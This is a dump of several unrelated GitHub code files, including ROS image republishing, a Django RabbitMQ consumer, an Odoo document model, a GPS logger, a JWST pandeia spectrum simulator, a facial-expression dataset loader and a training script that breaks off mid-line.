-1)\n if gate_.d.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.d.x)), int(round(gate_.d.y))), 5, (255,0,255), -1)\n\n if gate_.a.x != -1:\n cv2.circle(cv_image_r, (int(round(gate_.a.x)), int(round(gate_.a.y))), 5, (255,0,255), -1)\n if gate_.b.x != -1:\n cv2.circle(cv_image_r, (int(round(gate_.b.x)), int(round(gate_.b.y))), 5, (255,0,255), -1)\n if gate_.c.x != -1:\n cv2.circle(cv_image_r, (int(round(gate_.c.x)), int(round(gate_.c.y))), 5, (255,0,255), -1)\n if gate_.d.x != -1:\n 
cv2.circle(cv_image_r, (int(round(gate_.d.x)), int(round(gate_.d.y))), 5, (255,0,255), -1)\n\n    left = bridge.cv2_to_imgmsg(cv_image_l, \"bgr8\")\n    right = bridge.cv2_to_imgmsg(cv_image_r, \"bgr8\")\n    hl = std_msgs.msg.Header()\n    hr = std_msgs.msg.Header()\n    hl.stamp = image_data_l.header.stamp\n    hr.stamp = image_data_r.header.stamp\n    left.header = hl\n    right.header = hr\n    publ.publish(left)\n    pubr.publish(right)\n\n    # print(\"published\")\n    #cv2.imshow(\"window\", cv_image)\n    #cv2.waitKey(100)\n\ndef signal_handler(sig, frame):\n    print('\\n Bye bye!')\n    sys.exit(0)\n\ndef main():\n    signal.signal(signal.SIGINT, signal_handler)\n    rospy.init_node('republish_colored_gates_node')\n\n    ir_sub = message_filters.Subscriber('/uav/camera/left/ir_beacons', IRMarkerArray)\n    image_sub_l = message_filters.Subscriber('/uav/camera/left/image_rect_color', Image)\n    image_sub_r = message_filters.Subscriber('/uav/camera/right/image_rect_color', Image)\n\n    ts = message_filters.ApproximateTimeSynchronizer([ir_sub, image_sub_l, image_sub_r], 10, 0.3)\n    ts.registerCallback(callback)\n\n    rospy.spin()\n\nmain()\n","repo_name":"DevMMI/FlightGoggles_Training","sub_path":"republish_colored_gates.py","file_name":"republish_colored_gates.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"}
{"seq_id":"35347328245","text":"import pika\nimport json\nimport os\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"admin.settings\")\ndjango.setup()\n\n# import only after INSTALLED_APPS has been enabled\nfrom products.models import Product  # noqa: E402\n\nparams = pika.ConnectionParameters(\"rabbitmq\")\nconnection = pika.BlockingConnection(params)\nchannel = connection.channel()\n\nchannel.queue_declare(queue=\"admin\")\n\n\ndef callback(ch, method, properties, body):\n    print(\"Received in admin\")\n    id = json.loads(body)\n    print(id)\n    product = Product.objects.get(id=id)\n    product.likes = product.likes + 1\n    product.save()\n    print(\"Product likes increased!\")\n\n\nchannel.basic_consume(queue=\"admin\", on_message_callback=callback, auto_ack=True)\n\nprint(\"Started Consuming\")\n\nchannel.start_consuming()\n\nchannel.close()\n","repo_name":"ke6ch/python-microservice-camp","sub_path":"admin/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"17300058994","text":"import datetime\nfrom datetime import date\n\nfrom odoo import fields, models, api, _\n\n\nclass EducationDocuments(models.Model):\n    _name = 'education.documents'\n    _description = \"Student Documents\"\n    _inherit = ['mail.thread']\n\n    @api.model\n    def create(self, vals):\n        \"\"\"Overriding the create method to assign\n        the sequence for newly created records\"\"\"\n        if vals.get('name', _('New')) == _('New'):\n            vals['name'] = self.env['ir.sequence'].next_by_code(\n                'education.documents') or _('New')\n        res = super(EducationDocuments, self).create(vals)\n        return res\n\n    def verify_document(self):\n        \"\"\"Set the state to done if the documents are perfect\"\"\"\n        for rec in self:\n            rec.write({\n                'verified_by': self.env.uid,\n                'verified_date': datetime.datetime.now().strftime(\"%Y-%m-%d\"),\n                'state': 'done'\n            })\n\n    def need_correction(self):\n        \"\"\"Set the state to correction if the documents are not perfect\"\"\"\n        for rec in self:\n            rec.write({\n                'state': 'correction'\n            })\n\n    def hard_copy_returned(self):\n        \"\"\"Records who return the 
documents and when is it returned\"\"\"\n for rec in self:\n if rec.state == 'done':\n rec.write({\n 'state': 'returned',\n 'returned_by': self.env.uid,\n 'returned_date': datetime.datetime.now().strftime(\n \"%Y-%m-%d\")\n })\n\n name = fields.Char(string='Serial Number', copy=False,\n default=lambda self: _('New'))\n document_name = fields.Many2one('document.document', string='Document Type',\n required=True,\n help=\"Choose the type of the Document\")\n description = fields.Text(string='Description', copy=False,\n help=\"Enter a description about the document\")\n has_hard_copy = fields.Boolean(\n string=\"Hard copy Received\",\n help=\"Tick the field if the hard copy is provided\")\n location_id = fields.Many2one(\n 'stock.location', 'Location',\n domain=\"[('usage', '=', 'internal')]\",\n help=\"Location where which the hard copy is stored\")\n location_note = fields.Char(string=\"Location Note\",\n help=\"Enter some notes about the location\")\n submitted_date = fields.Date(string=\"Submitted Date\", default=date.today(),\n help=\"Documents are submitted on\")\n received_by = fields.Many2one('hr.employee', string=\"Received By\",\n help=\"The Documents are received by\")\n returned_by = fields.Many2one('hr.employee', string=\"Returned By\",\n help=\"The Documents are returned by\")\n verified_date = fields.Date(string=\"Verified Date\",\n help=\"Date at the verification is done\")\n returned_date = fields.Date(string=\"Returned Date\", help=\"Returning date\")\n reference = fields.Char(string='Document Number', required=True, copy=False)\n responsible_verified = fields.Many2one('hr.employee', string=\"Responsible\")\n responsible_returned = fields.Many2one('hr.employee', string=\"Responsible\")\n\n verified_by = fields.Many2one('res.users', string='Verified by')\n application_ref = fields.Many2one('education.application', invisible=1,\n copy=False)\n doc_attachment_id = fields.Many2many(\n 'ir.attachment', 'education_doc_attach_rel',\n 'doc_id', 'attach_id3',\n string=\"Attachment\",\n help='You can attach the copy of your document',\n copy=False)\n state = fields.Selection(\n [('draft', 'Draft'), ('correction', 'Correction'), ('done', 'Done'),\n ('returned', 'Returned')],\n string='State', required=True, default='draft',\n track_visibility='onchange')\n\n\nclass HrEmployeeAttachment(models.Model):\n _inherit = 'ir.attachment'\n\n doc_attach_rel = fields.Many2many('education.documents',\n 'doc_attachment_id', 'attach_id3',\n 'doc_id',\n string=\"Attachment\", invisible=1)\n\n\nclass DocumentDocument(models.Model):\n _name = 'document.document'\n _description = \"Documents Type\"\n\n name = fields.Char(string='Name', required=True)\n description = fields.Char(string='Description')\n","repo_name":"CybroOdoo/EducationalERP","sub_path":"education_core/models/education_documents.py","file_name":"education_documents.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"10662844600","text":"import random\nimport csv\ndef GetRandomSyn(file_name):\n random_line = GetRandomLine(file_name)\n random_line = random_line.upper() \n lst_line = random_line.split(\",\")\n chosen = lst_line[0]\n lst_syns=[]\n for i in range(1,len(lst_line),2):\n s = [lst_line[i],int(lst_line[i+1])]\n lst_syns.append(s)\n return chosen,lst_syns \n \ndef ReadCSV(filename):\n with open(filename, mode ='r')as file:\n csvFile = list(csv.reader(file))\n return csvFile \n \ndef GetRandomLine(file_name):\n with 
open(file_name,\"r\") as f:\n L1=f.read().splitlines()\n print(len(L1)) \n return random.choice(L1)\ndef GetAllWords(file_name):\n with open(file_name,\"r\") as f:\n L1=f.read().splitlines()\n return L1 \ndef GetRandomColor():\n \n color = random.randrange(0, 2**24)\n hex_color = hex(color)\n std_color = \"#\" + hex_color[2:]\n return std_color\n ","repo_name":"vihutuo/synonyms","sub_path":"mymodules/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38417592103","text":"import random\nimport time\nimport csv\nimport os\nfrom datetime import datetime\n\ndef collect_gps_data():\n lat = random.uniform(22.5, 22.6)\n lon = random.uniform(114.1, 114.2)\n speed = random.uniform(20, 60)\n gps_values = f\"Latitude:{lat} Longitude:{lon} Speed:{speed}\"\n return gps_values\n\ndef create_directory_if_not_exists(directory):\n if not os.path.exists(directory):\n try:\n os.makedirs(directory)\n except FileExistsError:\n pass # Directory already exists, ignore the error\n\ndef save_gps_data(directory, timestamp, gps, data_unit):\n file_name = \"gps.csv\"\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n if os.stat(file_path).st_size == 0:\n writer.writerow([\"Timestamp\", f\"GPS Values({data_unit})\"])\n writer.writerow([timestamp, gps])\n\n# Set the duration for the script to run (24 hours)\nduration = 24 * 60 * 60 # 24 hours in seconds\nstart_time = time.time()\ngps_unit = \"km/h\"\n\nwhile True:\n # Check if 24 hours have passed\n if time.time() - start_time > duration:\n break\n\n # Get the current timestamp\n current_timestamp = datetime.now()\n\n # Create directories for each day and hour\n day_directory = current_timestamp.strftime(\"%Y-%m-%d\")\n hour_directory = current_timestamp.strftime(\"%H\")\n directory_to_write = os.path.join(\"data\", day_directory, hour_directory)\n create_directory_if_not_exists(\"data\")\n create_directory_if_not_exists(os.path.join(\"data\", day_directory))\n create_directory_if_not_exists(directory_to_write)\n\n # GPS values reading\n gps_values = collect_gps_data()\n\n # Save the GPS values reading with timestamp to the CSV file\n save_gps_data(directory_to_write, current_timestamp, gps_values, gps_unit)\n\n # Print the simulated GPS values reading with timestamp (optional)\n print(f\"{current_timestamp} - GPS Values: {gps_values} {gps_unit}\")\n\n # Wait for 5 seconds before generating the next reading\n time.sleep(5)\n\n# Print a message indicating the end of the script\nprint(\"Script completed after 24 hours.\")\n\n","repo_name":"linweilonger/sc-group-projet3","sub_path":"gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7949250613","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nfrom astropy.io import fits\nimport h5py\n\nfrom astropy.table import Table\nfrom collections import OrderedDict\nimport argparse\n\nfrom pandeia_utils import bn, majorminor, sn_user_spec\n\nc_light = 2.99792e18 # Ang/s\n\n#This script was adapted from a short script written by Michael Maseda\n#demonstrating how to set up emission line S/N calculations in pandeia.\n\nexposureDict = {'DEEP':{'clear':{'ngroup':19,'nint':2,'nexp':36}}\n #'MEDIUM':{'clear':{'ngroup':13,'nint':1,'nexp':9}},\n }\n#exposureDict = 
{'DEEP':{'clear':{'ngroup':19,'nint':2,'nexp':36},'f070lp':{'ngroup':19,'nint':2,'nexp':9},'f100lp':{'ngroup':19,'nint':2,'nexp':9},'f170lp':{'ngroup':19,'nint':2,'nexp':9},'f290lp':{'ngroup':19,'nint':2,'nexp':9}},\\\n#                'MEDIUM':{'clear':{'ngroup':13,'nint':1,'nexp':9},'f070lp':{'ngroup':13,'nint':1,'nexp':9},'f100lp':{'ngroup':13,'nint':1,'nexp':9},'f170lp':{'ngroup':13,'nint':1,'nexp':9},'f290lp':{'ngroup':13,'nint':1,'nexp':9}},\\\n#                'MEDIUM_HST':{'clear':{'ngroup':16,'nint':1,'nexp':6},'f070lp':{'ngroup':13,'nint':1,'nexp':6},'f100lp':{'ngroup':13,'nint':1,'nexp':6},'f170lp':{'ngroup':13,'nint':1,'nexp':6},'f290lp':{'ngroup':16,'nint':1,'nexp':6}},\\\n#                'DEEP_WORST_CASE':{'clear':{'ngroup':19,'nint':2,'nexp':12}},\\\n#                'MEDIUM_WORST_CASE':{'clear':{'ngroup':13,'nint':1,'nexp':3}},\\\n#                'MEDIUM_HST_WORST_CASE':{'clear':{'ngroup':16,'nint':1,'nexp':6}}}\n#exposureDict = {'DEEP':{'clear':{'ngroup':19,'nint':2,'nexp':36}},\\\n#                'MEDIUM':{'clear':{'ngroup':13,'nint':1,'nexp':9}},\\\n#                'MEDIUM_HST':{'clear':{'ngroup':16,'nint':1,'nexp':6}},\\\n#                'DEEP_WORST_CASE':{'clear':{'ngroup':19,'nint':2,'nexp':12}},\\\n#                'MEDIUM_WORST_CASE':{'clear':{'ngroup':13,'nint':1,'nexp':3}},\\\n#                'MEDIUM_HST_WORST_CASE':{'clear':{'ngroup':16,'nint':1,'nexp':2}}}\n\nGratings = ['g140m', 'g140m', 'g235m', 'g395m']\nFilters = ['f070lp', 'f100lp', 'f170lp', 'f290lp']\nfilterDict = {'clear': 'prism',\n              'f070lp': 'g140m',\n              'f100lp': 'g140m',\n              'f170lp': 'g235m',\n              'f290lp': 'g395m'}\n\n\ndef get_beagle_input(iobj, args):\n    \"\"\"Given a set of arguments and an object index, return the input spectrum\n\n    Returns\n    --------\n\n    z : float\n        The redshift\n\n    wave : ndarray\n        The observed frame wavelength, in micron\n\n    spec : ndarray, same shape as wave\n        The observed frame fluxes in mJy\n\n    sizes : A structured array\n    \"\"\"\n    cat = fits.open(args.spectrum_file)\n    sizes, sizes_supplied = None, False\n    if args.sizes_file is not None:\n        sizes = fits.open(args.sizes_file)[1].data\n        sizes_supplied = True\n\n    wl = cat['FULL SED WL'].data[0][0]\n    spec = cat['FULL SED'].data[iobj, :]\n    z = cat['GALAXY PROPERTIES'].data['redshift'][iobj]\n\n    tempWl = wl * (1 + z)\n    tempSpec = spec / (1 + z)\n    # convert from erg/s/cm^2/AA to mJy\n    tempSpec *= tempWl**2 / c_light * 1e23 * 1e3\n    tempWl /= 1e4 # AA to micron\n    # list() is needed because zip objects are not reversible in Python 3;\n    # reversing keeps the first occurrence of any duplicated wavelength\n    deduped = {w: s for w, s in reversed(list(zip(tempWl, tempSpec)))}\n    tempWl = np.asarray(sorted(deduped.keys()))\n    tempSpec = np.asarray([deduped[k] for k in tempWl])\n\n    return z, tempWl, tempSpec, sizes\n\n\ndef get_pro_input(iobj, args):\n    \"\"\"Given a set of arguments and an object index, return the input spectrum\n\n    Returns\n    --------\n\n    z : float\n        The redshift\n\n    wave : ndarray\n        The observed frame wavelength, in micron\n\n    spec : ndarray, same shape as wave\n        The observed frame fluxes in mJy\n\n    sizes : A structured array\n    \"\"\"\n    sizes = None\n\n    with h5py.File(args.spectrum_file, \"r\") as f:\n        cat = f[str(iobj)][\"prospector_intrinsic\"]\n        wl = cat[\"wavelength\"][:]\n        spec = cat[\"spectrum\"][:]\n        z = cat.attrs[\"object_redshift\"]\n        if args.use_sizes:\n            sizes = f[str(iobj)][\"jaguar_parameters\"][()]\n\n    # convert from maggies to mJy\n    #assert cat.attrs[\"flux_units\"] == \"maggies\"\n    tempSpec = spec * 3631 * 1e3\n    # AA to micron\n    #assert cat.attrs[\"wave_units\"] == \"angstroms\"\n    tempWl = wl / 1e4\n\n    return z, tempWl, tempSpec, sizes\n\n\ndef build_input(iobj, args):\n\n    # get redshifted intrinsic spectrum\n    #try:\n    #    z, tempWl, tempSpec, sizes = get_beagle_input(iobj, args)\n    #except:\n    z, 
tempWl, tempSpec, sizes = get_pro_input(iobj, args)\n\n inputs = {\"wl\": tempWl, \"spec\": tempSpec,\n \"xoff\": 0, \"yoff\": 0,\n \"axis_ratio\": 1, \"sersic_n\": -99,\n \"position_angle\": 0, \"re_circ\": -99,\n \"onSource\": [False, True, False],\n \"slitletShape\": [[0, -1], [0, 0], [0, 1]],\n \"ID\": iobj}\n if sizes is not None:\n inputs['axis_ratio'] = sizes['axis_ratio']\n inputs['sersic_n'] = sizes['sersic_n']\n inputs['position_angle'] = sizes['position_angle']\n inputs['re_circ'] = (sizes['Re_maj'] *\n np.sqrt(sizes['axis_ratio'])\n )\n inputs['re_maj'] = sizes['Re_maj']\n #if 'ID' in sizes.dtype.names:\n # inputs[\"ID\"] = sizes[\"ID\"]\n\n return inputs, z\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--spectrum_file\", type=str, default=\"\")\n parser.add_argument(\"--use_sizes\", action=\"store_true\")\n parser.add_argument(\"--write_fits_spectrum\", action=\"store_true\")\n parser.add_argument(\"--nobj\", type=int, default=-99)\n parser.add_argument(\"--output_folder\", default=\".\")\n args = parser.parse_args()\n\n assert os.path.exists(args.output_folder)\n hfile = args.spectrum_file\n\n for iobj in range(args.nobj):\n\n inputs, z = build_input(iobj, args)\n # Produce a mock spectrum for extended and point source,\n # for each of the filter/grating configurations\n for exp in exposureDict.keys():\n for filt in exposureDict[exp].keys():\n try:\n report = sn_user_spec(inputs, disperser=filterDict[filt],\n filt=filt,\n ngroup=exposureDict[exp][filt]['ngroup'],\n nint=exposureDict[exp][filt]['nint'],\n nexp=exposureDict[exp][filt]['nexp'])\n except:\n print(\"Could not generate pandeia report for {}\".format(iobj))\n continue\n snr = report['1d']['sn'][1]\n spec = report['1d']['target'][1]\n unc = spec / snr\n noise = np.random.normal(0, np.abs(unc))\n noisy_spectrum = spec + noise\n\n outputDict = OrderedDict()\n outputDict['wl'] = report['1d']['extracted_flux'][0]\n outputDict['fnu'] = noisy_spectrum\n outputDict['fnu_err'] = unc\n outputDict['sn'] = snr\n outputDict['fnu_noiseless'] = spec\n\n # Checking for S/N around Halpha or OIII\n snwl = report['1d']['sn'][0]\n tempIdx = np.where((snwl >= 0.6450 * (1 + z)) &\n (snwl <= 0.6650 * (1 + z)))[0]\n #print(tempIdx)\n if len(tempIdx) == 0: # use region around OII 3727\n print(0.6450 * (1 + z), 0.3727 * (1 + z))\n tempIdx = np.where((snwl >= 0.3600 * (1 + z)) &\n (snwl <= 0.3800 * (1 + z)))[0]\n print(tempIdx)\n\n # Write spectrum if S/N > 3\n sn = np.max(report['1d']['sn'][1][tempIdx])\n print(iobj, sn)\n\n if filt == \"clear\":\n tag = \"{}_{}\".format(exp, \"R100\")\n else:\n tag = \"{}_{}\".format(exp, \"R1000\")\n\n if args.use_sizes:\n tag += \"_withSizes\"\n\n # Write to h5py\n if hfile != \"\":\n with h5py.File(hfile, \"r+\") as hcat:\n try:\n group = hcat[str(iobj)].create_group(tag)\n except(ValueError, NameError):\n del hcat[str(iobj)][tag]\n group = hcat[str(iobj)].create_group(tag)\n group.attrs[\"snr_line\"] = sn\n group.attrs[\"filter\"] = filt\n group.attrs[\"grating\"] = filterDict[filt]\n group.attrs[\"wave_units\"] = \"micron\"\n group.attrs[\"flux_units\"] = \"mJy\"\n for k, v in outputDict.items():\n d = group.create_dataset(k, data=v)\n\n if sn < 3:\n pass\n elif args.write_fits_spectrum:\n folder = os.path.join(args.output_folder, tag)\n os.makedirs(folder, exist_ok=True)\n #idStr = \"{:04.0f}\".format(int(inputs[\"ID\"]))\n idStr = \"{:.0f}\".format(int(inputs[\"ID\"]))\n outName = idStr+'_'+filt+'_'+filterDict[filt]\n if args.use_sizes:\n outName += 
'_extended.fits'\n outputFile = os.path.join(folder, outName)\n print(outputFile)\n outputTable = Table(outputDict)\n outputTable.write(outputFile, overwrite=True)\n","repo_name":"bd-j/jades_sed","sub_path":"scripts/pandeia/fsps_output_to_pandeia.py","file_name":"fsps_output_to_pandeia.py","file_ext":"py","file_size_in_byte":9612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21388807876","text":"import os\nimport pandas as pd\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader, random_split\nfrom torchvision import transforms\nfrom tqdm import tqdm\nimport h5py\n\n\n\nclass FER_CKPLUS_Dataset(Dataset):\n def __init__(self, img_dir, transform=None, h5_path=None, contour=False, **kargs):\n '''\n Pytorch Dataset class\n params:-\n img_dir : the directory of the images (root image dir)\n transform: pytorch transformation over the data\n h5_path : used for saving / reading dataset from h5 file\n contour : if enabled, contours generated by deformable model will be combined with images\n return :-\n image, labels\n '''\n # base transform, transforms passed by parameter will be append to the end of list\n transform_list = [\n transforms.ToTensor(),\n ]\n if transform:\n transform_list.extend(transform)\n transform_list.extend([\n transforms.Normalize((0.5,),(0.5,)),\n ])\n \n self.transform = transforms.Compose(transform_list)\n\n self.label_names = {\n # fer_ck_plus_kdef & CK_PLUS_256\n \"anger\": 0,\n \"disgust\": 1,\n \"fear\": 2,\n \"happiness\": 3,\n \"sadness\": 4,\n \"surprise\": 5,\n \"neutrality\": 6,\n # CK_PLUS (48x48) doesn't seem to find neutral in these data\n \"happy\" : 3,\n \"contempt\": 6,\n }\n\n self.num_label_names = {\n \"0\": 0,\n \"1\": 1,\n \"2\": 2,\n \"3\": 3,\n \"4\": 4,\n \"5\": 5,\n \"6\": 6\n }\n # either read from h5 file or read from image subdirectories\n if h5_path:\n self.read_h5(filepath=h5_path)\n\n else:\n self.imgs = []\n self.labels = []\n self.contours = []\n # read all subdirectories\n dirs = os.listdir(img_dir)\n for dir in dirs:\n print(f\"Reading from directory: {dir}\")\n if dir in self.label_names:\n curr_label = self.label_names[dir]\n elif dir in self.num_label_names:\n curr_label = self.num_label_names[dir]\n else:\n continue\n for file in tqdm(os.listdir(img_dir + \"/\" + dir), desc=f\"Loading {dir}\"):\n# # filename, ext = file.split(\".\")\n# contour_filepath = os.path.join(img_dir, dir, file)\n# img_filepath = os.path.join(img_dir, dir, file[:-11], \".png\")\n\n# # reading image and label\n# with Image.open(img_filepath) as img:\n# self.imgs.append(np.array(img))\n# self.labels.append(curr_label)\n# # if contour:\n# # try:\n# # reading corresponding contours\n# with Image.open(contour_filepath) as contour:\n# self.contours.append(np.array(contour))\n# # except:\n# # raise Exception(f\"Reading contour enabled, but contour file: {contour_filepath} not present.\")\n# # filename, ext = file.split(\".\")\n filename, ext = file.split(\".\")\n img_filepath = os.path.join(img_dir, dir, file)\n\n with Image.open(img_filepath) as img:\n if filename.endswith(\"_result\"):\n # reading contours\n self.contours.append(np.array(img))\n else:\n # reading image and label\n self.imgs.append(np.array(img))\n self.labels.append(curr_label)\n\n\n def show(self):\n pass\n\n def save_h5(self, savepath=\"./data/fer_ckplus.h5\"):\n \"\"\"\n save train/val dataset as single h5 file\n \"\"\"\n print(f\"Saving h5 file to: {savepath}\")\n with 
h5py.File(savepath, 'w') as hf:\n hf.create_dataset(\"imgs\", data=self.imgs)\n hf.create_dataset(\"labels\", data=self.labels)\n hf.create_dataset(\"contours\", data=self.contours)\n\n def read_h5(self, filepath=\"./data/fer_ckplus.h5\"):\n \"\"\"\n read h5 file into self.imgs and self.labels\n \"\"\"\n print(f\"Reading h5 file from: {filepath}\")\n with h5py.File(filepath, 'r') as hf:\n self.imgs = hf['imgs'][:]\n self.labels = hf['labels'][:]\n self.contours = hf['contours'][:]\n\n def __len__(self):\n return len(self.labels)\n\n def __getitem__(self, idx):\n img = self.imgs[idx]\n contour = self.contours[idx]\n label = self.labels[idx]\n img = self.transform(img)\n contour = self.transform(contour)\n # height = img.shape[0]\n # width = img.shape[1]\n # combine = np.zeros((height, width, 2))\n # combine[:,:,0]=img\n # combine[:,:,1]= contour\n combined = torch.concat((img, contour))\n return combined, label \n\n \n\n# class FER_CKPLUS_Dataloader:\n# def __init__(self, data_dir=\"data/fer_ckplus_kdef/\", batchsize=128, num_workers=4, resize=None, augment=True, h5_path=None, train_val_split=0.9, transform=None):\n# \"\"\"\n# generate train loader\n# \"\"\" \n# ds = FER_CKPLUS_Dataset(data_dir, transform=transform, resize=resize , h5_path=h5_path)\n# train_num = int(len(ds)*train_val_split) # default=0.9\n# val_num = len(ds) - train_num\n# train_ds, val_ds = random_split(ds, [train_num, val_num])\n# # not augment validation set\n# val_ds.is_train = False\n\n# # train loader\n# self.train_len = len(train_ds)\n# self.train_loader = DataLoader(\n# train_ds,\n# batch_size = batchsize,\n# shuffle = True,\n# num_workers = num_workers\n# )\n\n# # validation loader\n# self.val_len = len(val_ds)\n# self.val_loader = DataLoader(\n# val_ds,\n# batch_size = batchsize,\n# shuffle = True,\n# num_workers = num_workers\n# )\n\n\n\n\n\n\nif __name__ == \"__main__\":\n # dl = FER_CKPLUS_Dataloader(\"data/CK_PLUS_CONTOUR\")\n # test_loader = DataLoader(test_dataset,batch_size=128,shuffle = True,num_workers=0, h5_path=\"./data/fer_ckplus.h5\")\n dataset = FER_CKPLUS_Dataset(\"data/CK_PLUS_CONTOUR\")\n dataset.save_h5(savepath=\"./data/CK_PLUS_CONTOUR/CK_PLUS_CONTOUR.h5\")\n","repo_name":"bznick98/learning-emotion-with-deformable-model","sub_path":"datasets/fer_ckplus_kdef.py","file_name":"fer_ckplus_kdef.py","file_ext":"py","file_size_in_byte":6820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27876972283","text":"from datetime import date\nfrom datetime import datetime\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import fetch_california_housing\nfrom sklearn.preprocessing import StandardScaler\nfrom torchvision import datasets, transforms\n\nimport copy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport plotly.express as px\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport tqdm\n\ndef save_my_work(model, logfile, xdata_name, opt, N, Bsize, learningRate, epoch, second_time, best_mse, mse, loss, init_time):\n model_save_time = str(int(time.time()))\n model_file_name = '/content/drive/MyDrive/0_318lab/SCMP_ML/'+'model' + model_save_time + '.pt'\n torch.save(model, model_file_name )\n print(\n datetime.now(),\n 'data:', xdata_name,\n file=logfile\n )\n print(\n ', layer_dim_list:', dim_list,\n 'activateion:', act,\n ', optimizer:', opt,\n ', n_of_data:',N,\n ', Bsize:', Bsize ,\n ', 
learningRate:', learningRate ,\n        file=logfile\n    )\n    print(\n        ', epoch: %5d' % epoch,\n        ', passed_time: %.3f' % ( ( ( time.time()-second_time ) ) / 60 ), 'm',\n\n        \", minimum_RMSE: %.2f\" % (best_mse),\n        ', test_loss: %2f' % (mse),\n        ', train_loss: %2f' % (loss),\n        ', passed_time_accum: %.3f' % ( ( time.time() - init_time ) / 60 ), 'm',\n        file=logfile\n    )\n    plt.plot(history)\n    plt.yscale('log')\n    plt.title('test_loss')\n    plt.savefig(\n        model_file_name[0:-3] + 'test_loss' + '.pdf',\n        format=\"pdf\",\n        bbox_inches=\"tight\"\n    )\n    plt.show()\n\n    plt.plot(history_train)\n    plt.title('train_loss')\n    plt.yscale('log')\n    plt.savefig(\n        model_file_name[0:-3] + 'train_loss' + '.pdf',\n        format=\"pdf\",\n        bbox_inches=\"tight\"\n    )\n    plt.show()\n    \n    \ndef print_progress(epoch, mse, loss, second_time):\n    print('epoch: %5d' % epoch,\n          ', test_loss: {:7.1f}'.format(mse),\n          ', train_loss: {:7.1f}'.format(loss),\n          ', est_time: {:5.1f}'.format(( ( ( time.time()-second_time ) ) / 60 )), 'min,',\n          'average_time: {:.2f}'.format( ( time.time()-second_time )/(epoch+1)), 's'\n          )\n    \nN, D_in, D_out = 10000, 2, 1\n\nxdata_name = 'data/KEdataX_N_' + str(N) + '_Interval_10_1691050560.pt'\nydata_name = 'data/KEdataY_N_' + str(N) + '_Interval_10_1691050560.pt'\nX = torch.load(xdata_name)\ny = torch.load(ydata_name)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.7, shuffle=False)\n\n\n#default\n\n\"\"\"\ntry\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 100 , learningRate: 0.0005 , minimum_RMSE: 27.47 , epoch: 3660 , test_loss: 595.456665 , train_loss: 14.215258 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.000 m , passed_time: -160.696 s\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 100 , learningRate: 5e-05 , minimum_RMSE: 252.92 , epoch: 3668 , test_loss: 256.572418 , train_loss: 184.996445 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.000 m , passed_time: -170.736 s\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 10 , learningRate: 0.005 , minimum_RMSE: 77.75 , epoch: 386 , test_loss: 3821.791748 , train_loss: 5.220962 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.010 m , passed_time: -30.134 s\n\nactivateion: Softplus , optimizer: Adam , n_of_data: 10000 , Bsize: 500 , learningRate: 0.001 , minimum_RMSE: 22.67 , epoch: 13813 , test_loss: 15479.684570 , train_loss: 1186.494629 , layer_dim_list: [2, 20, 20, 20, 20, 1] , passed_time: 5.000 m , passed_time: -205.868 s\n\n\"\"\"\n# for learningRate in range(10): #\n\n\ndim_list = [2, 20, 20, 20, 20, 1]\n\n\nf = open(\"/content/drive/MyDrive/0_318lab/SCMP_ML/log.txt\", \"a\")\n#If the data is less complex and has fewer dimensions or features, then neural networks with 1 to 2 hidden layers would work.\n# If the data has many dimensions or features, then 3 to 5 hidden layers can be used to get an optimum solution.\n\ninit_time = time.time()\nprint('start')\nfor act in [\n    # 'LeakyReLU',\n    # 'LogSigmoid',\n    'Softplus']:\n\n    for opt in [\n        # 'Adadelta',\n        # 'Adagrad',\n        'Adam',\n        # 'AdamW',\n        # 'SparseAdam',\n        # 'Adamax',\n        # 'ASGD',\n        # 'LBFGS',\n        # 'NAdam',\n        # 'RAdam',\n        # 'RMSprop',\n        # 'Rprop',\n        # 'SGD'\n        ]:\n        try:\n            # for Bsize in [ 10, 50, 100, 500]:\n            # for Bsize in [ 10, 100, 1000]:\n            for batch_size in [ 10]:\n\n                # for learningRate in [ 1e-1, 1e-2, 1e-3, 1e-4,1e-5, 1e-6, ]:\n                # for learningRate in [ 1e-1, 5e-1, 1e-2, 5e-2, 1e-3, 5e-3, 1e-4, 5e-4, 1e-5, 5e-5, 1e-6, 5e-6, ]:\n                for learningRate in [ 0.005 ]:\n\n                    make_model 
